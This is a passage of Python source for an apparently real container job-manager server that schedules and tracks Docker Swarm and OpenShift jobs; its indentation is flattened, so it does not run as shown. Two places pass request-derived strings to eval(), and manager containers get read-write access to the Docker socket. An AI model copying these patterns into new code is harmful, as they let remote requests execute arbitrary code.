d_ret['l_status'] = l_status
d_ret['l_logs'] = l_logs
return {
"d_ret": d_ret,
"status": b_status
}
def DB_store(self, data, str_path, str_file):
"""
In the DB memory tree, simply stores <data> to a location called
<str_path> and a file called <str_file>.
Explicitly separating <str_path> and <str_file> is just for
expedience in checking up on path validity in the DB memory tree.
This method also triggers a DB save event.
"""
if not self.within.ptree.exists(str_file, path = str_path):
self.within.ptree.touch('%s/%s' % (str_path, str_file), data)
# Save DB state...
self.within.DB_fileIO(cmd = 'save')
def t_status_process_container_stateObject(self, *args, **kwargs):
"""
This method processes the swarm manager state object and, if
necessary, shuts down the service from the swarm scheduler.
PRECONDITIONS:
o This method should only ever be called by t_status_process_container().
POSTCONDITIONS:
o A string denoting the current state is returned.
o If state is complete and service still running, save state object to
tree and remove service.
o Store the state object and logs in the internal DB tree!
"""
def service_exists(str_serviceName):
"""
Returns a bool:
- True: <str_serviceName> does exist
- False: <str_serviceName> does not exist
"""
b_exists = False
client = docker.from_env()
try:
service = client.services.get(str_serviceName)
b_exists = True
except:
b_exists = False
return b_exists
def service_shutDown_check():
"""
Verifies that a docker service can be shutdown.
Should multiple jobs have been scheduled temporally serially
with the same jid/serviceName, then the actual service can
only be shut down once all identical jobs have had their
state stored.
Returns bool:
- True: can shut down
- False: cannot shut down
"""
ret = False
if int(str_hitIndex) < int(d_jobState['hits'])-1:
ret = False
else:
ret = True
return ret
def service_shutDown(d_serviceInfo):
"""
Shut down a service
"""
client = docker.from_env()
str_cmdShutDown = '%s --remove %s' % \
(d_serviceInfo['managerApp'], d_serviceInfo['serviceName'])
byte_str = client.containers.run(
'%s' % d_serviceInfo['managerImage'],
str_cmdShutDown,
volumes = {
'/var/run/docker.sock':
{
'bind': '/var/run/docker.sock',
'mode': 'rw'
}
},
remove=True)
return byte_str
d_serviceState = None
d_jobState = None
str_hitIndex = "0"
str_logs = ""
for k,v in kwargs.items():
if k == 'jobState': d_jobState = v
if k == 'serviceState': d_serviceState = v
if k == 'hitIndex': str_hitIndex = v
if k == 'logs': str_logs = v
if d_serviceState:
d_ret = self.t_status_process_state(**kwargs)
# d_ret {
# 'currentState': str_currentState,
# 'removeJob': b_removeJob,
# 'status': True
# }
if d_ret['removeJob']:
str_jobRoot = d_jobState['d_ret']['%s.container' % (str_hitIndex)]['jobRoot']
self.within.ptree.cd('/%s/container' % str_jobRoot)
d_serviceInfo = {
'serviceName': self.within.ptree.cat('manager/env/serviceName'),
'managerImage': self.within.ptree.cat('manager/image'),
'managerApp': self.within.ptree.cat('manager/app')
}
if service_exists(d_serviceInfo['serviceName']):
service_shutDown(d_serviceInfo)
return {
'status': True,
'd_process': d_ret
}
def t_status_process_container(self, *args, **kwargs):
"""
Execution should only reach this method for "container"ized jobs
status determination!
The 'd_state' contains a dictionary representation of the container
DB tree.
PRECONDITIONS:
o Only call this method if a container structure exists
in the relevant job tree!
POSTCONDITIONS:
o If the job is completed, then shutdown the container cluster
service.
o The memory container tree contains a dictionary called 'state'
that is the state returned by the container service, as well as
a file called 'logs' that is the stdout/stderr generated by the
job as it ran in the container.
"""
d_state = None
str_jobRoot = ''
str_hitIndex = "0"
str_logs = ''
for k,v in kwargs.items():
if k == 'd_state': d_state = v
if k == 'hitIndex': str_hitIndex = v
self.dp.qprint('checking on status using container...')
str_jobRoot = d_state['d_ret']['%s.container' % str_hitIndex]['jobRoot']
self.within.ptree.cd('/%s/container' % str_jobRoot)
str_serviceName = self.within.ptree.cat('manager/env/serviceName')
str_managerImage = self.within.ptree.cat('manager/image')
str_managerApp = self.within.ptree.cat('manager/app')
# Check if the state of the container service has been recorded to the data tree
if self.within.ptree.exists('state', path = '/%s/container' % str_jobRoot):
# If this exists, then the job has actually completed and
# its state has been recorded in the data tree. We can simply 'cat'
# the state from this memory dictionary
d_serviceState = self.within.ptree.cat('/%s/container/state' % str_jobRoot)
if self.within.ptree.exists('logs', path = '/%s/container' % str_jobRoot):
# The job has actually completed and its logs are recorded in the data tree
str_logs = self.within.ptree.cat('/%s/container/logs' % str_jobRoot)
else:
# Here, the manager has not been queried yet about the state of
# the service. We need to ask the container service for this
# state, and then record the state (and logs) in the memory
# tree, and then "shut down" the service.
client = docker.from_env()
# Get the state of the service...
str_cmdManager = '%s --state %s' % \
(str_managerApp, str_serviceName)
byte_str = client.containers.run(
'%s' % str_managerImage,
str_cmdManager,
volumes = {
'/var/run/docker.sock':
{
'bind': '/var/run/docker.sock',
'mode': 'rw'
}
},
remove = True)
d_serviceState = json.loads(byte_str.decode())
# Now, parse for the logs of the actual container run by the service:
# NB: This has only really tested/used on swarm!!
b_containerIDFound = True
try:
str_contID = d_serviceState['Status']['ContainerStatus']['ContainerID']
b_containerIDFound = True
except:
b_containerIDFound = False
if b_containerIDFound:
container = client.containers.get(str_contID)
str_logs = container.logs()
str_logs = str_logs.decode()
d_ret = self.t_status_process_container_stateObject(
hitIndex = str_hitIndex,
jobState = d_state,
serviceState = d_serviceState,
logs = str_logs
)
# d_ret {
# 'status': bool,
# d_process: {
# 'currentState': str_currentState,
# 'removeJob': b_removeJob,
# 'status': True
# }
# }
return {
'status': d_ret['status'],
'logs': str_logs,
'currentState': d_ret['d_process']['currentState']
}
def t_delete_process(self,*args, **kwargs):
"""
Deletes existing jobs. Checks if container environment is OpenShift.
If yes, call t_delete_process_openshift to delete the job.
Pending implementation for other container environment.
"""
status = jid = ''
if self.container_env == 'openshift':
self.dp.qprint('Processing openshift....')
try:
d_containerStatus = self.t_delete_process_openshift(*args, **kwargs)
status = d_containerStatus['status']
jid = d_containerStatus['jid']
except Exception as e:
if e.reason and e.reason == 'Not Found':
status = logs = currentState = e.reason
else:
raise e
d_ret = {
'action' : 'Delete Job',
'job_id' : jid,
'status' : status
}
return {
"d_ret": d_ret,
"status": status
}
def t_delete_process_openshift(self,*args, **kwargs):
"""
Delete job and related resources (pods & pvc) from OpenShift
"""
jid = status = None
for k,v in kwargs.items():
if k == 'request' and v['action'] == 'delete' : jid = v['meta']['value']
d_json = self.get_openshift_manager().state(jid)
if d_json['Status'] == 'Not Found':
status = d_json['Status']
else:
self.get_openshift_manager().remove_job(jid)
self.get_openshift_manager().remove_pvc(jid)
status = 'Job deleted successfully'
return {
"jid" : jid,
"status" : status
}
def t_status_process_openshift(self, *args, **kwargs):
"""
Determine the status of a job scheduled using the openshift manager.
PRECONDITIONS:
o Only call this method if a container structure exists
in the relevant job tree!
POSTCONDITIONS:
o If the job is completed, then shutdown the container cluster
service.
"""
self.dp.qprint('------- Processing job status within t_status_process_openshift ----------- ')
str_logs = ''
# Get job-id from request
for k,v in kwargs.items():
if k == 'request' and v['action'] == 'status' : jid = v['meta']['value']
# Query OpenShift API to get job state
d_json = self.get_openshift_manager().state(jid)
if d_json['Status']['Message'] == 'finished':
pod_names = self.get_openshift_manager().get_pod_names_in_job(jid)
for _, pod_name in enumerate(pod_names):
str_logs += self.get_openshift_manager().get_job_pod_logs(pod_name, jid)
else:
str_logs = d_json['Status']['Message']
status = d_json['Status']
currentState = d_json['Status']['Message']
return {
'status': status,
'logs': str_logs,
'currentState': [currentState]
}
def t_status_process_openshift_stateObject(self, *args, **kwargs):
"""
Process the actual JSON container return object on service
state.
PRECONDITIONS:
o This method should only ever be called by t_status_process_openshift().
POSTCONDITIONS:
o A string denoting the current state is returned.
"""
def job_exists(jid):
"""
Returns a bool:
- True: <jid> does exist
- False: <jid> does not exist
"""
b_exists = False
try:
job = self.get_openshift_manager().get_job(jid)
b_exists = True
except:
b_exists = False
return b_exists
def job_shutDown(d_serviceInfo):
"""
Shut down a service
"""
try:
self.get_openshift_manager().remove_pvc(jid)
self.get_openshift_manager().remove_job(jid)
except Exception as err:
self.dp.qprint("Error deleting pvc/job:", err)
d_serviceState = None
d_jobState = None
str_hitIndex = "0"
str_logs = ""
d_ret = {}
for k,v in kwargs.items():
if k == 'jobState': d_jobState = v
if k == 'serviceState': d_serviceState = v
if k == 'hitIndex': str_hitIndex = v
if k == 'logs': str_logs = v
if d_serviceState:
d_ret = self.t_status_process_state(**kwargs)
if d_ret['removeJob']:
str_jobRoot = d_jobState['d_ret']['%s.container' % (str_hitIndex)]['jobRoot']
self.within.ptree.cd('/%s' % str_jobRoot)
jid = self.within.ptree.cat('jid')
if job_exists(jid):
job_shutDown(jid)
return {
'status': True,
'd_process': d_ret
}
def get_openshift_manager(self):
if not self.openshiftmgr:
self.openshiftmgr = OpenShiftManager()
return self.openshiftmgr
def t_status_process_state(self, *args, **kwargs):
"""
This method processes the swarm state object to make the
final determination on a job's state and print out container
job state and logs.
It also returns a signal to the caller to trigger the removal
of the job from the swarm scheduler if the job has completed.
"""
def debug_print( str_jobRoot,
d_serviceState,
str_currentState,
str_logs
):
"""
Simply print some useful debug info.
"""
l_commsNorm = ['rx', 'rx', 'tx']
l_commsErr = ['error', 'error', 'error']
l_comms = l_commsNorm
if str_currentState == 'finishedWithError':
l_comms = l_commsErr
self.dp.qprint('\njobRoot %s\n-->%s<--...' % \
(str_jobRoot,
str_currentState),
comms = l_comms[0])
self.dp.qprint('\n%s' % self.df_print(d_serviceState),
comms = l_comms[1])
self.dp.qprint('\njob logs:\n%s' % str_logs,
comms = l_comms[2])
d_serviceState = {}
d_jobState = {}
hitIndex = 0
str_logs = ""
b_status = False
str_currentState = "undefined"
for k,v in kwargs.items():
if k == 'jobState': d_jobState = v
if k == 'serviceState': d_serviceState = v
if k == 'hitIndex': str_hitIndex = v
if k == 'logs': str_logs = v
b_removeJob = False
str_jobRoot = d_jobState['d_ret']['%s.container' % (hitIndex)]['jobRoot']
str_state = d_serviceState['Status']['State']
str_message = d_serviceState['Status']['Message']
if str_state == 'running' and str_message == 'started':
str_currentState = 'started'
debug_print(str_jobRoot, d_serviceState, str_currentState, str_logs)
b_status = True
else:
self.DB_store(d_serviceState, '/%s/container' % (str_jobRoot), 'state')
self.DB_store(str_logs, '/%s/container' % (str_jobRoot), 'logs')
b_removeJob = True
if str_state == 'failed' and str_message == 'started':
str_currentState = 'finishedWithError'
debug_print(str_jobRoot, d_serviceState, str_currentState, str_logs)
elif str_state == 'complete' and str_message == 'finished':
str_currentState = 'finishedSuccessfully'
debug_print(str_jobRoot, d_serviceState, str_currentState, str_logs)
b_status = True
self.DB_store(str_currentState, '/%s/container' % (str_jobRoot), 'currentState')
if str_currentState == 'undefined':
self.dp.qprint('The state of the job is undefined!', comms = 'error')
self.dp.qprint('This typically means that the scheduler rejected the job.', comms = 'error')
self.dp.qprint('jobRoot = %s' % str_jobRoot, comms = 'error')
return {
'currentState': str_currentState,
'removeJob': b_removeJob,
'status': b_status
}
def t_hello_process(self, *args, **kwargs):
"""
The 'hello' action is merely to 'speak' with the server. The server
can return current date/time, echo back a string, query the startup
command line args, etc.
This method is a simple means of checking if the server is "up" and
running.
:param args:
:param kwargs:
:return:
"""
self.dp.qprint("In hello process...")
b_status = False
d_ret = {}
for k, v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
if 'askAbout' in d_meta.keys():
str_askAbout = d_meta['askAbout']
d_ret['name'] = self.within.str_name
d_ret['version'] = self.within.str_version
if str_askAbout == 'timestamp':
str_timeStamp = datetime.datetime.today().strftime('%Y%m%d%H%M%S.%f')
d_ret['timestamp'] = {}
d_ret['timestamp']['now'] = str_timeStamp
b_status = True
if str_askAbout == 'sysinfo':
d_ret['sysinfo'] = {}
d_ret['sysinfo']['system'] = platform.system()
d_ret['sysinfo']['machine'] = platform.machine()
d_ret['sysinfo']['platform'] = platform.platform()
d_ret['sysinfo']['uname'] = platform.uname()
d_ret['sysinfo']['version'] = platform.version()
d_ret['sysinfo']['memory'] = psutil.virtual_memory()
d_ret['sysinfo']['cpucount'] = multiprocessing.cpu_count()
d_ret['sysinfo']['loadavg'] = os.getloadavg()
d_ret['sysinfo']['cpu_percent'] = psutil.cpu_percent()
d_ret['sysinfo']['hostname'] = socket.gethostname()
d_ret['sysinfo']['inet'] = [l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) if l][0][0]
b_status = True
if str_askAbout == 'echoBack':
d_ret['echoBack'] = {}
d_ret['echoBack']['msg'] = d_meta['echoBack']
b_status = True
return { 'd_ret': d_ret,
'status': b_status}
def t_run_process(self, *args, **kwargs):
"""
Main job handler -- this is in turn a thread spawned from the
parent listener thread.
By being threaded, the client http caller gets an immediate
response without needing to wait on the jobs actually running
to completion.
"""
str_cmd = ""
d_request = {}
d_meta = {}
d_Tcontainer = {}
for k,v in kwargs.items():
if k == 'request': d_request = v
if k == 'treeList': d_Tcontainer = v
d_meta = d_request['meta']
if d_meta:
self.jid = d_meta['jid']
self.auid = d_meta['auid']
str_cmd = d_meta['cmd']
if isinstance(self.jid, int):
self.jid = str(self.jid)
self.dp.qprint("spawning and starting poller thread")
# Start the 'poller' worker
self.poller = Poller(cmd = str_cmd,
debugToFile = self.b_debugToFile,
verbosity = self.verbosity,
debugFile = self.str_debugFile)
self.poller.start()
str_timeStamp = datetime.datetime.today().strftime('%Y%m%d%H%M%S.%f')
str_uuid = uuid.uuid4()
str_dir = '%s_%s' % (str_timeStamp, str_uuid)
self.str_jobRootDir = str_dir
b_jobsAllDone = False
p = self.within.ptree
p.cd('/')
p.mkcd(str_dir)
if d_Tcontainer:
# Save the trees in this list to the DB...
for name,tree in d_Tcontainer.items():
p.mkcd(name)
tree.copy(startPath = '/', destination = p, pathDiskRoot = '/%s/%s' % (str_dir, name))
p.cd('/%s' % str_dir)
p.touch('d_meta', json.dumps(d_meta))
for detailKey in ['cmdMgr', 'cmdMgr_byte_str']:
if detailKey in d_meta.keys():
p.touch(detailKey, json.dumps(d_meta[detailKey]))
p.touch('cmd', str_cmd)
if len(self.auid):
p.touch('auid', self.auid)
if len(self.jid):
p.touch('jid', self.jid)
p.mkdir('start')
p.mkdir('end')
jobCount = 0
p.touch('jobCount', jobCount)
while not b_jobsAllDone:
try:
b_jobsAllDone = self.poller.queueAllDone.get_nowait()
except queue.Empty:
self.dp.qprint('Waiting on start job info')
d_startInfo = self.poller.queueStart.get()
str_startDir = '/%s/start/%d' % (self.str_jobRootDir, jobCount)
p.mkdir(str_startDir)
p.cd(str_startDir)
p.touch('startInfo', d_startInfo.copy())
p.touch('/%s/startInfo' % str_dir, d_startInfo.copy())
self.dp.qprint('Waiting on end job info')
d_endInfo = self.poller.queueEnd.get()
str_endDir = '/%s/end/%d' % (self.str_jobRootDir, jobCount)
p.mkdir(str_endDir)
p.cd(str_endDir)
p.touch('endInfo', d_endInfo.copy())
p.touch('/%s/endInfo' % str_dir, d_endInfo.copy())
p.touch('/%s/jobCount' % str_dir, jobCount)
jobCount += 1
self.dp.qprint('All jobs processed.')
# Save DB state...
self.within.ptree = p
self.within.DB_fileIO(cmd = 'save')
def FScomponent_pollExists(self, *args, **kwargs):
"""
This method polls access to a file system component (a file or
directory). Its purpose is to wait for possible transients when
an asynchronous process creates a file system component that some
method in pmans wants to access.
"""
maxLoopTries = 20
currentLoop = 1
str_dir = ''
for k, v in kwargs.items():
if k == 'maxLoopTries': maxLoopTries = v
if k == 'dir': str_dir = v
b_exists = False
b_checkAgain = True
while b_checkAgain:
self.dp.qprint('Checking if %s exists (currentLoop: %d)...' % (str_dir, currentLoop), comms = 'rx')
b_exists = os.path.exists(str_dir)
if b_exists:
b_checkAgain = False
self.dp.qprint('Dir exists!', comms = 'rx')
else:
self.dp.qprint('Dir does not exist! Sleeping...', comms = 'error')
time.sleep(2)
currentLoop += 1
if currentLoop == maxLoopTries:
b_checkAgain = False
return b_exists
def t_run_process_container(self, *args, **kwargs):
"""
A threaded run method specialized to handling containerized managers and targets.
NOTE: If 'serviceName' is not specified/present, then this defaults to the 'jid'
value and is in fact the default behaviour.
Typical JSON d_request:
{ "action": "run",
"meta": {
"cmd": "$execshell $selfpath/$selfexec --prefix test- --sleepLength 0 /share/incoming /share/outgoing",
"auid": "rudolphpienaar",
"jid": "simpledsapp-1",
"threaded": true,
"container": {
"target": {
"image": "fnndsc/pl-simpledsapp"
},
"manager": {
"image": "fnndsc/swarm",
"app": "swarm.py",
"env": {
"shareDir": "/home/tmp/share",
"serviceType": "docker",
"serviceName": "testService"
}
}
}
}
}
"""
str_cmd = ""
str_shareDir = ""
str_serviceName = ""
d_request = {}
d_meta = {}
d_container = {}
d_image = {}
d_manager = {}
d_env = {}
self.dp.qprint('Processing swarm-type job...')
for k,v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
if d_meta:
self.jid = d_meta['jid']
self.auid = d_meta['auid']
str_cmd = d_meta['cmd']
str_serviceName = self.jid
if 'container' in d_meta.keys():
d_container = d_meta['container']
d_target = d_container['target']
str_targetImage = d_target['image']
d_manager = d_container['manager']
str_managerImage = d_manager['image']
str_managerApp = d_manager['app']
d_env = d_manager['env']
if 'shareDir' in d_env.keys():
str_shareDir = d_env['shareDir']
# Remove trailing '/' if it exists in shareDir
str_shareDir = str_shareDir.rstrip('/')
b_exists = self.FScomponent_pollExists(dir = str_shareDir)
if not b_exists:
self.dp.qprint('Could not access volume mapped share dir: %s' % str_shareDir, comms = 'error')
if 'STOREBASE' in os.environ:
str_storeBase = os.environ['STOREBASE']
(str_origBase, str_key) = os.path.split(str_shareDir)
self.dp.qprint('Overriding shareDir (orig): %s' % str_shareDir)
str_shareDir = os.path.join(str_storeBase, str_key)
self.dp.qprint('Overriding shareDir (new): %s' % str_shareDir)
if 'serviceName' in d_env.keys():
str_serviceName = d_env['serviceName']
else:
d_env['serviceName'] = str_serviceName
# First, attach to the docker daemon...
client = docker.from_env()
str_cmdLine = str_cmd
str_cmdManager = '%s -s %s -m %s -i %s -p none -c "%s"' % \
(str_managerApp, str_serviceName, str_shareDir, str_targetImage, str_cmdLine)
try:
byte_str = client.containers.run('%s' % str_managerImage,
str_cmdManager,
volumes = {'/var/run/docker.sock': {'bind': '/var/run/docker.sock', 'mode': 'rw'}},
remove = True)
except Exception as e:
# An exception here most likely occurs due to a serviceName collision.
# Solution is to stop the service and retry.
str_e = '%s' % e
print(str_e)
d_meta['cmdMgr'] = '%s %s' % (str_managerImage, str_cmdManager)
d_meta['cmdMrg_byte_str'] = str(byte_str, 'utf-8')
# Call the "parent" method -- reset the cmdLine to an "echo"
# and create an stree off the 'container' dictionary to store
# in the pman DB entry.
d_meta['cmd'] = 'echo "%s"' % str_cmd
T_container = C_stree()
T_container.initFromDict(d_container)
d_Tcontainer = {'container': T_container}
self.t_run_process(request = d_request,
treeList = d_Tcontainer)
self.dp.qprint('Returning from swarm-type job...')
def t_run_process_openshift(self, *args, **kwargs):
"""
A threaded run method specialized for handling openshift
"""
str_cmd = ""
d_request = {}
d_meta = {}
d_container = {}
d_image = {}
self.dp.qprint('Processing openshift job...')
for k,v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
if d_meta:
self.jid = d_meta['jid']
self.auid = d_meta['auid']
str_cmd = d_meta['cmd']
# TODO: Currently it is assumed that incoming and outgoing dir will always be the last two arg
# It holds true for 'ds' plugins but not for 'fs' plugins.
# Implementation to support both fs ad ds plugins should be incorporated.
str_arr = str_cmd.split()
incoming_dir = str_arr[len(str_arr)-2]
outgoing_dir = str_arr[len(str_arr)-1]
if 'number_of_workers' in d_meta:
number_of_workers = d_meta['number_of_workers']
else:
number_of_workers = '1'
if 'cpu_limit' in d_meta:
cpu_limit = d_meta['cpu_limit']
else:
cpu_limit = '2000m'
if 'memory_limit' in d_meta:
memory_limit = d_meta['memory_limit']
else:
memory_limit = '1024Mi'
if 'gpu_limit' in d_meta:
gpu_limit = d_meta['gpu_limit']
else:
gpu_limit = 0
if 'container' in d_meta:
d_container = d_meta['container']
d_target = d_container['target']
str_targetImage = d_target['image']
# Create the Persistent Volume Claim
if os.environ.get('STORAGE_TYPE') == 'swift':
self.dp.qprint("Creating shared PVC")
self.get_openshift_manager().create_pvc(self.jid)
str_cmdLine = str_cmd
self.get_openshift_manager().schedule(str_targetImage, str_cmdLine, self.jid,
number_of_workers, cpu_limit, memory_limit, gpu_limit,
incoming_dir, outgoing_dir)
self.dp.qprint('Returning from openshift job...')
def json_filePart_get(self, **kwargs):
"""
If the requested path is *within* a json "file" on the
DB, then we need to find the file, and map the relevant
path to components in that file.
"""
def DB_get(self, **kwargs):
"""
Returns part of the DB tree based on path spec in the URL
"""
r = C_stree()
p = self.within.ptree
pcwd = p.cwd()
str_URLpath = "/api/v1/"
for k,v in kwargs.items():
if k == 'path': str_URLpath = v
str_path = '/' + '/'.join(str_URLpath.split('/')[3:])
self.dp.qprint("path = %s" % str_path)
if str_path == '/':
# If root node, only return list of jobs
l_rootdir = p.lstr_lsnode(str_path)
r.mknode(l_rootdir)
else:
# Here is a hidden behaviour. If the 'root' dir starts
# with an underscore, then replace that component of
# the path with the actual name in list order.
# This is simply a short hand way to access indexed
# offsets.
l_path = str_path.split('/')
jobID = l_path[1]
# Does the jobID start with an underscore?
if jobID[0] == '_':
jobOffset = jobID[1:]
l_rootdir = list(p.lstr_lsnode('/'))
self.dp.qprint('jobOffset = %s' % jobOffset)
self.dp.qprint(l_rootdir)
try:
actualJob = l_rootdir[int(jobOffset)]
except:
return False
l_path[1] = actualJob
str_path = '/'.join(l_path)
r.mkdir(str_path)
r.cd(str_path)
r.cd('../')
# if not r.graft(p, str_path):
if not p.copy(startPath = str_path, destination = r)['status']:
# We are probably trying to access a file...
# First, remove the erroneous path in the return DB
r.rm(str_path)
# Now, we need to find the "file", parse the json layer
# and save...
n = 0
contents = p.cat(str_path)
str_pathFile = str_path
l_path = str_path.split('/')
totalPathLen = len(l_path)
l_pathFile = []
while not contents and -1*n < totalPathLen:
n -= 1
str_pathFile = '/'.join(str_path.split('/')[0:n])
contents = p.cat(str_pathFile)
l_pathFile.append(l_path[n])
if contents and n<0:
l_pathFile = l_pathFile[::-1]
str_access = ""
for l in l_pathFile:
str_access += "['%s']" % l
self.dp.qprint('str_access = %s' % str_access)
try:
contents = eval('contents%s' % str_access)
except:
contents = False
r.touch(str_path, contents)
p.cd(pcwd)
self.dp.qprint(r)
# self.dp.qprint(dict(r.snode_root))
self.dp.qprint(self.pp.pformat(dict(r.snode_root)).strip())
return dict(r.snode_root)
# return r
def process(self, request, **kwargs):
""" Process the message from remote client
In some philosophical respects, this process() method in fact implements
REST-like API of its own.
"""
if len(request):
REST_header = ""
REST_verb = ""
str_path = ""
json_payload = ""
self.dp.qprint("Listener ID - %s: process() - handling request" % (self.worker_id))
now = datetime.datetime.today()
str_timeStamp = now.strftime('%Y-%m-%d %H:%M:%S.%f')
self.dp.qprint(Colors.YELLOW)
self.dp.qprint("***********************************************")
self.dp.qprint("***********************************************")
self.dp.qprint("%s incoming data stream" % (str_timeStamp) )
self.dp.qprint("***********************************************")
self.dp.qprint("len = %d" % len(request))
self.dp.qprint("***********************************************")
self.dp.qprint(Colors.CYAN + "%s\n" % (request.decode()) + Colors.YELLOW)
self.dp.qprint("***********************************************" + Colors.NO_COLOUR)
l_raw = request.decode().split('\n')
FORMtype = l_raw[0].split('/')[0]
self.dp.qprint('Request = ...')
self.dp.qprint(l_raw)
REST_header = l_raw[0]
REST_verb = REST_header.split()[0]
str_path = REST_header.split()[1]
json_payload = l_raw[-1]
# remove trailing '/' if any on path
if str_path[-1] == '/': str_path = str_path[0:-1]
d_ret = {'status': False,
'RESTheader': REST_header,
'RESTverb': REST_verb,
'action': "",
'path': str_path,
'receivedByServer': l_raw}
self.dp.qprint("Using token authentication: %s" % self.b_tokenAuth)
if (not self.b_tokenAuth) or self.authModule.authorizeClientRequest(request.decode())[0]:
self.dp.qprint("Request authorized")
if REST_verb == 'GET':
d_ret['GET'] = self.DB_get(path = str_path)
d_ret['status'] = True
self.dp.qprint('json_payload = %s' % self.pp.pformat(json_payload).strip())
d_ret['client_json_payload'] = json_payload
d_ret['client_json_len'] = len(json_payload)
if len(json_payload):
d_payload = json.loads(json_payload)
d_request = d_payload['payload']
payload_verb = d_request['action']
if 'meta' in d_request.keys():
d_meta = d_request['meta']
d_ret['payloadsize']= len(json_payload)
if payload_verb == 'quit':
self.dp.qprint('Shutting down server...')
d_ret['status'] = True
if payload_verb == 'run' and REST_verb == 'PUT':
d_ret['action'] = payload_verb
self.processPUT( request = d_request)
d_ret['status'] = True
if REST_verb == 'POST':
self.processPOST( request = d_request,
ret = d_ret)
else:
self.dp.qprint("Request unauthorized")
return d_ret
else:
return False
def methodName_parse(self, **kwargs):
"""
Construct the processing method name (string) by parsing the
d_meta dictionary.
"""
d_meta = {}
str_method = "" # The main 'parent' method
str_methodSuffix = "" # A possible 'subclass' specialization
for k,v in kwargs.items():
if k == 'request': d_request= v
payload_verb = d_request['action']
if 'meta' in d_request.keys():
d_meta = d_request['meta']
if 'container' in d_meta.keys():
if self.container_env == 'openshift':
# append suffix _openshift to redirect to openshift function
str_methodSuffix = '_openshift'
elif self.container_env == 'swarm':
# append suffix _container to redirect to container function
str_methodSuffix = '_container'
str_method = 't_%s_process%s' % (payload_verb, str_methodSuffix)
return str_method
def processPOST(self, **kwargs):
"""
Dispatcher for POST
"""
for k,v in kwargs.items():
if k == 'request': d_request = v
if k == 'ret': d_ret = v
payload_verb = d_request['action']
if 'meta' in d_request.keys():
d_meta = d_request['meta']
d_ret['action'] = payload_verb
d_ret['meta'] = d_meta
b_threaded = False
if 'threaded' in d_meta.keys():
b_threaded = d_meta['threaded']
if b_threaded:
self.dp.qprint("Will process request in new thread.")
pf_method = None
str_method = self.methodName_parse(request = d_request)
# str_method = 't_%s_process' % payload_verb
try:
pf_method = getattr(self, str_method)
except AttributeError:
raise NotImplementedError("Class `{}` does not implement `{}`".format(pman.__class__.__name__, str_method))
t_process = threading.Thread( target = pf_method,
args = (),
kwargs = kwargs)
t_process.start()
time.sleep(0.1)
# if payload_verb == 'run':
# d_ret['jobRootDir'] = self.str_jobRootDir
d_ret['status'] = True
else:
self.dp.qprint("Will process request in current thread.")
d_done = eval("self.t_%s_process(request = d_request)" % payload_verb)
try:
d_ret['d_ret'] = d_done["d_ret"]
d_ret['status'] = d_done["status"]
except:
self.dp.qprint("An error occurred in reading ret structure. Should this method have been threaded?")
return d_ret
def processPUT(self, **kwargs):
"""
Dispatcher for PUT
"""
d_request = {}
str_action = "run"
str_cmd = "save"
str_DBpath = self.str_DBpath
str_fileio = "json"
tree_DB = self.within.ptree
for k,v in kwargs.items():
if k == 'request': d_request = v
str_action = d_request['action']
self.dp.qprint('action = %s' % str_action)
d_meta = d_request['meta']
self.dp.qprint('action = %s' % str_action)
# Optional search criteria
if 'key' in d_meta:
d_search = self.t_search_process(request = d_request)['d_ret']
Tj = C_stree()
Tdb = C_stree()
for j in d_search.keys():
d_j = d_search[j]
for job in d_j.keys():
str_pathJob = '/api/v1/' + job
d_job = self.DB_get(path = str_pathJob)
Tj.initFromDict(d_job)
Tj.copy(startPath = '/', destination = Tdb)
# Tdb.graft(Tj, '/')
# self.DB_get(path = str_pathJob).copy(startPath = '/', destination = Tdb)
# print(Tdb)
tree_DB = Tdb
if 'context' in d_meta: str_context = d_meta['context']
if 'operation' in d_meta: str_cmd = d_meta['operation']
if 'dbpath' in d_meta: str_DBpath = d_meta['dbpath']
if 'fileio' in d_meta: str_fileio = d_meta['fileio']
if str_action.lower() == 'run' and str_context.lower() == 'db':
self.within.DB_fileIO( cmd = str_cmd,
fileio = str_fileio,
dbpath = str_DBpath,
db = tree_DB)
class Poller(threading.Thread):
"""
The Poller checks for running processes based on the internal
DB and system process table. Jobs that are no longer running are
removed from the internal DB.
"""
def __init__(self, **kwargs):
self.pollTime = 10
self.str_cmd = ""
self.crunner = None
self.queueStart = queue.Queue()
self.queueEnd = queue.Queue()
self.queueAllDone = queue.Queue()
self.__name__ = 'Poller'
# self.dp.qprint('starting...', level=-1)
# Debug parameters
self.str_debugFile = '/dev/null'
self.b_debugToFile = True
self.verbosity = 1
for key,val in kwargs.items():
if key == 'pollTime': self.pollTime = val
if key == 'cmd': self.str_cmd = val
if key == 'debugFile': self.str_debugFile = val
if key == 'debugToFile': self.b_debugToFile = val
if key == 'verbosity': self.verbosity = int(val)
self.dp = pfmisc.debug(
verbosity = self.verbosity,
debugFile = self.str_debugFile,
debugToFile = self.b_debugToFile,
within = self.__name__)
threading.Thread.__init__(self)
def run(self):
timeout = 1
loop = 10
""" Main execution. """
# Spawn the crunner object container
self.crunner = Crunner(cmd = self.str_cmd,
debugToFile = self.b_debugToFile,
verbosity = self.verbosity,
debugFile = self.str_debugFile)
self.crunner.start()
b_jobsAllDone = False
while not b_jobsAllDone:
try:
b_jobsAllDone = self.crunner.queueAllDone.get_nowait()
except queue.Empty:
# We basically propagate the queue contents "up" the chain.
self.dp.qprint('Waiting on start job info')
self.queueStart.put(self.crunner.queueStart.get())
self.dp.qprint('Waiting on end job info')
self.queueEnd.put(self.crunner.queueEnd.get())
self.queueAllDone.put(b_jobsAllDone)
self.dp.qprint("done with Poller.run")
class Crunner(threading.Thread):
"""
The wrapper thread about the actual process.
"""
def __init__(self, **kwargs):
self.__name = "Crunner"
self.queueStart = queue.Queue()
self.queueEnd = queue.Queue()
self.queueAllDone = queue.Queue()
self.str_cmd = ""
# Debug parameters
self.str_debugFile = '/dev/null'
self.b_debugToFile = True
self.verbosity = 1
for k,v in kwargs.items():
if k == 'cmd': self.str_cmd = v
if k == 'debugFile': self.str_debugFile = v
if k == 'debugToFile': self.b_debugToFile = v
if k == 'verbosity': self.verbosity = int(v)
self.shell = crunner( verbosity = self.verbosity,
debugToFile = self.b_debugToFile,
debugFile = self.str_debugFile)
